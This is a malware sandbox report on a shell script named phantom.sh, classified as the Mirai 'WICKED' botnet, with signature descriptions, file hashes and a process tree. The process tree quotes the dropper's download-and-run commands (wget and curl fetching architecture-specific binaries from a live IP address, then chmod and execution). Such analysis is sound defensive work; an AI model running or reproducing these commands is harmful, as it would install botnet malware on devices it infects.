Overview

overview

10

Static

static

1

phantom.sh

ubuntu-18.04-amd64

10

phantom.sh

debian-9-armhf

10

phantom.sh

debian-9-mips

10

phantom.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    23/03/2025, 02:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    phantom.sh

  • Size

    1KB

  • MD5

    b25643d9ed071bba8af0ef060b5180bf

  • SHA1

    12c13e5c16cabcd24f9c38b750acd5be92df73ec

  • SHA256

    2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf

  • SHA512

    5eac9707aa2c220394b2d2be4737451e8b1cba8fe86611656c3ac599ffc6c1b24f4a30e4a40122f57bda4a0ad7d5dc5862cdf779e7f481c7f396bd757fe016c9

Score
10/10
miraiwickedbotnetcredential_accessdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 64 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 21 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/phantom.sh
    /tmp/phantom.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:693
    • /usr/bin/wget
      wget http://157.245.211.199/bins/x86
      2⤵
      • Writes file to tmp directory
      PID:699
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:713
    • /bin/cat
      cat x86
      2⤵
        PID:722
      • /bin/chmod
        chmod +x dbot phantom.sh systemd-private-aea8e47d0cb54e3884dd508cc7badd73-systemd-timedated.service-BjAUSi x86
        2⤵
        • File and Directory Permissions Modification
        PID:723
      • /tmp/dbot
        ./dbot Payload
        2⤵
          PID:724
        • /usr/bin/wget
          wget http://157.245.211.199/bins/mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:726
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/mips
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:728
        • /bin/cat
          cat mips
          2⤵
          • System Network Configuration Discovery
          PID:729
        • /bin/chmod
          chmod +x dbot mips phantom.sh systemd-private-aea8e47d0cb54e3884dd508cc7badd73-systemd-timedated.service-BjAUSi x86
          2⤵
          • File and Directory Permissions Modification
          PID:730
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          PID:731
        • /usr/bin/wget
          wget http://157.245.211.199/bins/mpsl
          2⤵
          • Writes file to tmp directory
          PID:735
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/mpsl
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:736
        • /bin/chmod
          chmod +x dbot mips mpsl phantom.sh systemd-private-aea8e47d0cb54e3884dd508cc7badd73-systemd-timedated.service-BjAUSi x86
          2⤵
          • File and Directory Permissions Modification
          PID:738
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:739
        • /usr/bin/wget
          wget http://157.245.211.199/bins/arm
          2⤵
          • Writes file to tmp directory
          PID:785
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/arm
          2⤵
          • Writes file to tmp directory
          PID:791
        • /bin/chmod
          chmod +x arm dbot mips mpsl phantom.sh x86
          2⤵
          • File and Directory Permissions Modification
          PID:794
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:795
        • /usr/bin/wget
          wget http://157.245.211.199/bins/arm5
          2⤵
          • Writes file to tmp directory
          PID:801
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/arm5
          2⤵
          • Writes file to tmp directory
          PID:830
        • /bin/chmod
          chmod +x arm arm5 dbot mips mpsl phantom.sh x86
          2⤵
          • File and Directory Permissions Modification
          PID:832
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:833
        • /usr/bin/wget
          wget http://157.245.211.199/bins/arm6
          2⤵
          • Writes file to tmp directory
          PID:837
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/arm6
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:838
        • /bin/chmod
          chmod +x arm arm5 arm6 dbot mips mpsl phantom.sh x86
          2⤵
          • File and Directory Permissions Modification
          PID:840
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:841
        • /usr/bin/wget
          wget http://157.245.211.199/bins/arm7
          2⤵
          • Writes file to tmp directory
          PID:844
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/arm7
          2⤵
          • Writes file to tmp directory
          PID:846
        • /bin/chmod
          chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh x86
          2⤵
          • File and Directory Permissions Modification
          PID:848
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:849
        • /usr/bin/wget
          wget http://157.245.211.199/bins/spc
          2⤵
          • Writes file to tmp directory
          PID:852
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/spc
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:854
        • /bin/chmod
          chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh spc x86
          2⤵
          • File and Directory Permissions Modification
          PID:856
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads process memory
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:857
        • /usr/bin/wget
          wget http://157.245.211.199/bins/m68k
          2⤵
          • Writes file to tmp directory
          PID:861
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/m68k
          2⤵
          • Writes file to tmp directory
          PID:863
        • /bin/chmod
          chmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh spc x86
          2⤵
          • File and Directory Permissions Modification
          PID:865
        • /tmp/dbot
          ./dbot Payload
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:866
        • /usr/bin/wget
          wget http://157.245.211.199/bins/sh4
          2⤵
          • Writes file to tmp directory
          PID:870
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/sh4
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:871
        • /bin/chmod
          chmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh sh4 spc x86
          2⤵
          • File and Directory Permissions Modification
          PID:873
        • /tmp/dbot
          ./dbot Payload
          2⤵
            PID:874

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/arm
          Filesize

          65KB

          MD5

          c41a79699de953380428ae97410bb85f

          SHA1

          747a2e1757455604ec6ab089eeec07744b71d79c

          SHA256

          753c2a1eaa8b0212cd1f451ff250d96f46c0d035c02b6909aaf02018b7835ecf

          SHA512

          c0f23806b1d470d24c77cd76e93e4981bf806a8c74cc38322448566976bc0412176847210a1c6bfa1448bff9ef5ba91ffd35bd1857ae80a5bb0448f386c7753c

          Download Submit

        • /tmp/arm5
          Filesize

          41KB

          MD5

          2b9ff651d116fd4220b9ef064edc87ed

          SHA1

          82a30aec3a92d6b9aa928c49c775bdc5c7f368a7

          SHA256

          a683e1c24a8f520953bd275cd7a49788e1fe492c2a1f810a85c5275f0063250e

          SHA512

          e5affabceca41f66b769c7d707e5040e7feaceab8fb45a2953f596c82641d30244030d7d2605a0765d6a29763502563be99a944fa7d993d483f35ec097fd92ea

          Download Submit

        • /tmp/arm6
          Filesize

          73KB

          MD5

          9b4a9ffc8981f7af2b338260b47f8ae7

          SHA1

          5558be7ec4a318c25c659764ebacdc9ca066fdcd

          SHA256

          b76c2cbe3d2450fea49fd42f29c29bc18bced3ef0001f9ac10e057d3a590056d

          SHA512

          80b23756ebaddf8104482a45473f5dedc31ca14ec4eeffab70677a4762b0e4c77350a33c53eac4d5282138e73c1b5f1db2574732c7acae3f098e5e580c7e4b1a

          Download Submit

        • /tmp/arm7
          Filesize

          140KB

          MD5

          a4f6cf4e6edb03734e3fd5d250dfa63b

          SHA1

          1297b2b89a27d8c3615548099cd38cbab48dc406

          SHA256

          5cc8e494a701a2f510cff13ec26bc59ef4c8f0812685a1ff7752a1c613f52f31

          SHA512

          5e1828b4cf29b04a553895af4299a46d83de01f59142737b1a66d121047404636d7c38b4052319fc6c5d5be100af82d7c9c54f4c41f5aa80bc3d423e70e8eb78

          Download Submit

        • /tmp/m68k
          Filesize

          65KB

          MD5

          0a548e5e31b00bd078466d15eb16e546

          SHA1

          0203328ab86cda8492ca3ea86528c4272394e7e8

          SHA256

          3235403721303e205a16197923af1e265a884bbf847e85334f4c9e1872cc21a3

          SHA512

          fb5ceb1dd5786462a89d61e133b587fb5fdec8b638be3f7af288930bb74a600aaf0b8932f6765318a5a9948fd22e83e5ec4c392dd907e298159eddf6a3576cee

          Download Submit

        • /tmp/mips
          Filesize

          82KB

          MD5

          7f3a7052000e43a7ea7b3831d3471c53

          SHA1

          ea0f5ad61681af067cd5c8a6c1fe9f8df20e7fb0

          SHA256

          740e42e867d99cdcdc6e3905156543ac4463f26a20a87cefa21907ffa926fd27

          SHA512

          a93e9477a07d66ea950b8cceba5b9953fb9266606cee61ec8d8dbe854f276b0a8df85ae5f80fb738cb0f3a8f7c322e2953757e392443fba6b85adcd14c602e28

          Download Submit

        • /tmp/mpsl
          Filesize

          82KB

          MD5

          d10cde406bb6e741caa075ae3eb1b59b

          SHA1

          3b8761c325ff59e67ced6151d5c0b483e7009ff0

          SHA256

          33aaa80f492242f0a5e3e8edec511d11b09910e21d044b7425f2b19c79885275

          SHA512

          d475ae20989beac90cb6bd51b2a91536880af3c07c7a5e5de5210670ee0292e599871488659fbf99206aaf1e99e19b5344ef936a0a602abffdf62b4473edb48d

          Download Submit

        • /tmp/sh4
          Filesize

          54KB

          MD5

          1aa4143ebcf26124be79600326fd0e38

          SHA1

          b166ad38f3ee4faf5876417db28aa3ab1c211cff

          SHA256

          21a3cd61d4c9043b38ac2d0afe218c89d7205855bfaa7f91a20f7872b9124e4b

          SHA512

          dbe5e2027add1007806e7d500517d538c4b669c36778ba88acf4c376c1ffa33e7bce8cd6c1a33d147b5490d8ab342a0f77a15a111603faa508d0b827c86ccdd5

          Download Submit

        • /tmp/spc
          Filesize

          65KB

          MD5

          19d915863ed88ad6cfbed0a9e91875b4

          SHA1

          2a162911ba6df6689052c4f4f215e2a509e875e6

          SHA256

          83ea2fbf03f0177db78259a4eadda417ec881202c66bba84f3f0ee20ed098dba

          SHA512

          b75deb4f8c8f59c8a079b41648d390758a2aa05e763d91e6c834d2344df6050779dcfa7040271f63970cd657d258e4f7294ce1888f0dcdd8b6d77d246447f60a

          Download Submit

        • /tmp/x86
          Filesize

          56KB

          MD5

          a7b4473399ce74c911ec86fe9f3a2295

          SHA1

          16ceb93a19944b099d8da7c0f42faa92954fd8e7

          SHA256

          5064463e3dcdc501a0cd479dcb09b24bd3bd0bf7cbacac0341f09c85f7dce81e

          SHA512

          32031eae5f5e33a5c5c3c2f97d69675e54ddc3b74f85016418d543ff2a806cf92f77ca5b5c1085e5691544ced62c1b05e4d56da01d62d0e07b5555d40d151125

          Download Submit